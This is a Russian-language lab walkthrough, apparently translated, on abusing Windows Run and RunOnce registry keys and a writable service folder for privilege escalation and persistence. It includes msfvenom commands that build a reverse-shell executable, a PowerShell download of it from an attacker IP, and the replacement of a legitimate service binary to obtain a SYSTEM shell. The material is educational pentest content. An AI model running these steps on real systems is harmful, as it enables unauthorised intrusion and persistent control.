Здравствуйте, дорогие друзья.
Если злоумышленник обнаружит службу, имеющую все разрешения и ее привязку к ключу запуска реестра, он сможет выполнить атаку с повышением привилегий или постоянную атаку. Когда законный пользователь входит в систему, связь службы с реестром будет выполнена автоматически, и эта атака известна как выполнение автозапуска входа в систему из-за ключей запуска реестра.
Существует два метода выполнения автоматического запуска при входе в систему:
Выполнение автозапуска входа в систему: ключи запуска реестра
Выполнение автозапуска входа в систему: папка автозагрузки
Содержание
Ключи реестра Run и RunOnce
Загрузочный | Выполнение автозапуска входа в систему (атака под углом)
Предварительное условие
Настройка лаборатории
Повышение привилегий путем злоупотребления ключами запуска реестра
· Перечисление разрешений назначения с помощью WinPEAS
· Создание вредоносного исполняемого файла
Ключи реестра Run и RunOnce
Ключи реестра Run и RunOnce позволяют запускать программы каждый раз, когда пользователь входит в систему. Ключи реестра «Выполнить», будут запускать задачу каждый раз при входе в систему. Ключи реестра RunOnce запускают задачи один раз, а затем удаляют этот ключ. Затем есть Run и RunOnce; единственное отличие состоит в том, что RunOnce автоматически удалит запись после успешного выполнения.
Ключи запуска реестра выполняют то же действие, но могут находиться в четырех разных местах:
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\RunOnce
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\RunOnce
Загрузочный | Выполнение автозапуска входа в систему: ключи запуска реестра
Внедрение вредоносной программы в папку автозагрузки также приведет к запуску этой программы при входе пользователя в систему, что может помочь злоумышленнику выполнить постоянные атаки или атаки с повышением привилегий из неправильно настроенных расположений папок автозагрузки.
Этот метод является наиболее эффективным методом обеспечения устойчивости, используемым хорошо известными APT, такими как APT18, APT29, APT37 и т. д.
Mitre ID: T1574.001
Тактика: повышение привилегий и сохранение
Платформы:Windows
Предварительное условие
Целевая машина: Windows 10.
Машина злоумышленника: Kali Linux
Инструменты: Winpeas.exe (https://github.com/carlospolop/PEASS-ng/blob/master/winPEAS/winPEASexe/README.md).
Условие: скомпрометируйте целевую машину с низким уровнем привилегий, используя Metasploit, Netcat и т. д.
Цель: повысить привилегии NT Authority/SYSTEM для пользователя с низкими привилегиями, используя неправильно настроенную папку автозагрузки.
Настройка лаборатории
Примечание. Данные действия создадут лазейку через неправильно настроенную папку автозагрузки, что позволит избежать такой настройки в производственной среде.
Шаг 1: создайте новый каталог внутри Program Files.
mkdir C:\Program Files\Ignite Service
Шаг 2: Добавьте в этот каталог приложение, службу или программу.
Шаг 3: Измените разрешения для текущего каталога, разрешив полный доступ для прошедших проверку подлинности пользователей.
Шаг 4: Откройте командную строку «Выполнить», введите regedit.msc, чтобы изменить раздел реестра. Перейдите в HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run и создайте новое строковое значение «Services».
Шаг 5: Укажите путь к сервису, который Вы создали в /program files/Ignite (путь к Вашему сервису).
Повышение привилегий путем злоупотребления ключами запуска реестра
Перечисление разрешений на назначение с помощью Winpeas
Злоумышленники могут использовать эти места конфигурации для запуска вредоносных программ, таких как RAT, чтобы обеспечить сохранение работоспособности во время перезагрузки системы.
После первоначальной точки опоры мы можем определить разрешения с помощью следующей команды:
winPEASx64.exe quiet applicationinfo
Здесь мы перечислили ВСЕ разрешения, назначенные для аутентифицированных пользователей в отношении «Ignite Services».
Создание вредоносного исполняемого файла
Поскольку мы знаем, что ВСЕ пользователи имеют разрешения на чтение и запись для папки «Ignite Services», это значит, что мы можем внедрить RAT для сохранения или повышения привилегий. Давайте создадим исполняемую программу с помощью msfvenom.
msfvenom –p windows/shell_reverse_tcp lhost=192.168.1.3 lport=8888 –f exe > shell.exe
python –m SimpleHTTPServer 80
Прежде чем заменить исходный файл file.exe вредоносным файлом на exe, переименуйте исходный файл file.exe в file.bak.
Запуск вредоносного исполняемого файла
Запустите прослушиватель netcat в новом терминале и передайте файл file.exe с помощью следующей команды:
powershell wget 192.168.1.3/shell.exe -o shell.exe
dir
Как мы знаем, эта атака называется Boot Logon Autostart Execution, что означает, что файл file.exe срабатывает при перезагрузке системы.
Злоумышленник получит обратное соединение в новом сеансе netcat как NT Authority \System.
Ссылки:
https://docs.microsoft.com/en-us/windows/win32/setupapi/run-and-runonce-registry-keys
https://attack.mitre.org/techniques/T1547/001/
На этом все. Всем хорошего дня!